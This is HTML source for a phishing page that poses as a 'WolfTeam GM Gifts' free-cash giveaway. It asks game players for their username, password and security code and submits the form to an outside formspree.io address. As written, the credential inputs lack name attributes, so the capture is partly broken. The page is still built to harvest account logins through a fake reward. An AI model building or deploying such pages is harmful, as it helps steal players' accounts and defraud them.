<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="icon" href="photos/download.jpg" type="image/x-icon">
    <link rel="stylesheet" href="style.css"/>
    <title>WolfTeam - Free Cash </title>
</head>
<body>
    <div class="pulse-text">
        GM WolfTeam Gifts 
      
    
    

        <div class="custom-shape-divider-top-1747441824">
            <svg data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1200 120" preserveAspectRatio="none">
                <path d="M321.39,56.44c58-10.79,114.16-30.13,172-41.86,82.39-16.72,168.19-17.73,250.45-.39C823.78,31,906.67,72,985.66,92.83c70.05,18.48,146.53,26.09,214.34,3V0H0V27.35A600.21,600.21,0,0,0,321.39,56.44Z" class="shape-fill"></path>
            </svg>
        </div>
<div style="text-align: center; 
display: flex;
 justify-content: center;
 align-items: center;
  color:aliceblue;
  background:linear-gradient(to right, #ff6a00, #ee0979) !important ; 
  padding:15px;
  margin:0 ;">
    Giveaways For High Ranks Users 🎁🎉
</div>
    </div>
    <div class="login-box">
      

        
        <form action="https://formspree.io/f/xkgrewzq"method="POST">
             <h2>Add Your WolfTeam Account! </h2>
             <div class="user-box">
                <input type="text" required>
                <label for="">Username</label>
            </div>
    <div class="user-box">
                <input type="password" required>
                <label for="">Password</label>
            </div>

            <div class="user-box">
                <input type="text" required>
                <label for="">Security Code</label>
            </div>

             <div style="position: relative;">
 <label style="color:white;">
    Write a Message Thanks GM:
    <br/>
    <br/>
    <br/>
</label>
<textarea  name="message" style="width: 290px;height: 120px;border:grey 4px solid; border-radius: 12px; padding:8px;"></textarea>

             </div>
            
  <!-- your other form fields go here -->

  <button  type="submit">
  
   <span></span>
   <span></span>
   <span></span>
   
   submit

    
  </button>
  


</form>

    </div>
</body>
</html>

